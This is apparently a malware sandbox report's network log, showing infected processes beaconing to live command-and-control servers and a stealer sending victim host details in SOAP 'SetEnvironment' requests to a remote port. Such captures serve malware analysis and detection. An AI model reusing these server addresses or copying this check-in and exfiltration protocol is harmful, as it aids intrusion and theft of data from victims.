                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.5 | 49987 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:35.319962978 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:35.568784952 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:35.589591026 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:35.843333006 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.5 | 49988 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:35.532418966 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:35.776182890 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
150 | 192.168.2.5 | 49989 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:36.138465881 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:36.384691000 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
151 | 192.168.2.5 | 49990 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:36.251488924 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:36.495367050 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:36.498276949 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:36.746958971 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
152 | 192.168.2.5 | 49991 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:36.633208990 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:36.879944086 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
153 | 192.168.2.5 | 49992 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:37.104927063 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:37.350583076 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:37.352253914 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:37.603714943 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
154 | 192.168.2.5 | 49993 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:37.241275072 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:37.485696077 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
155 | 192.168.2.5 | 49994 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:37.740948915 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:37.993130922 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
156 | 192.168.2.5 | 49995 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:37.962435007 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:38.211004972 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:38.215601921 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:38.469396114 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
157 | 192.168.2.5 | 49997 | 147.185.221.19 | 30946 | 7324 | C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:38.291428089 CEST | 228 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95722
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
Apr 19, 2024 03:30:38.955063105 CEST | 1289 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95722
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironment xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000188001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>
Apr 19, 2024 03:31:08.224847078 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 147
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Apr 19, 2024 03:31:08.531841993 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 147
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
158 | 192.168.2.5 | 49998 | 147.185.221.19 | 30946 | 5608 | C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:38.297364950 CEST | 228 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95721
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
Apr 19, 2024 03:30:38.954663992 CEST | 1289 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95721
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironment xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000187001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>
Apr 19, 2024 03:31:08.224087954 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 147
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Apr 19, 2024 03:31:08.531725883 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 147
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
159         192.168.2.5  49996        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:30:38.351089001 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
